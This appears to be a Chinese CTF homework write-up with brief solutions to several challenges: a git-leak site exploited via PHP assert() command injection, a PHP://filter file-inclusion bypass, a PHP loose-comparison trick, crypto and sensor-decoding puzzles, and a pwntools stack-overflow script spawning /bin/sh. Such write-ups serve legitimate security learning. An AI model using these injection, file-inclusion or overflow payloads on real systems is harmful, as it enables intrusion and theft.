1.20作业

发布于:2025-02-21 ⋅ 阅读:(102) ⋅ 点赞:(0)

1 mfw(git泄露)

./git,原本以为点了链接下了index文件,就可以打开看源码,结果解析不了

老老实实用了githacker

githacker --url      --output 1

assert()

断言(assert)的用法 | 菜鸟教程

命令注入:

/?page=').system('cat ./templates/flag.php');//

assert("strpos('templates/') or system('cat ./templates/flag.php');

//.php', '..') === false") or die("Detected hacking attempt!");

2 salted

53aaefcc805940d4b79a403127384d3d.png

base64解密,开头就是salted(AES DES RC4 Rabbit TripleDes)

c7b573216ce741969916395d8bb2ff6b.png

试了试是Rabbit

全是大写,base32解码;python转字符

hex_string=''
flag_string= ''.join(chr(int(hex_string[i:i+2], 16)) for i in range(0, len(hex_string), 2))
print(flag_string)

3 simple_php(松散比较)

>==,!==,(<>不等于,大于小于是松散比较)

(字符串和数字admin,1admin)(科学计数法0)(ture与非零字符串都是ture)

?a=0abc&b=1235abc

Web_php_include

strstr()函数:大小写敏感,用大写的PHP://来绕过过滤

/?page=PHP://filter/read=convert.base64-encode/resource=fl4gisisish3r3.php

4 传感器2

百度一种可能:曼彻斯特编码

搜了搜wp:解析曼彻斯特编码实战-CSDN博客

删除3E可能是因为温度传感器解码后报文第一个字节为起始位,并无数据,因此从第二个字节开始,得到传感器1中两个解码后的报文有效数据为为0x24d8893ca5841000x24d8845abf34100

最后一个字节是校验位

然后涉及CRC校验攻防世界 Misc高手进阶区 7分题 传感器2_攻防世界传感器2-CSDN博客

5ezstack

·打开环境,nc连接checksec用相应ida打开附件:

1.定义了一个字符串v4且距离栈底0x20,有gets函数(危险,可通过此函数进行溢出)

2.发现/bin/sh地址,通过get函数【溢出到此处】,获取权限

from pwn import*

p=remote("node4.anna.nssctf.cn",28968)

payload=b'b'*(0x20+8)+p64(0x400730)

p.sendline(payload)

p.interactive()


网站公告

今日签到

点亮在社区的每一天
去签到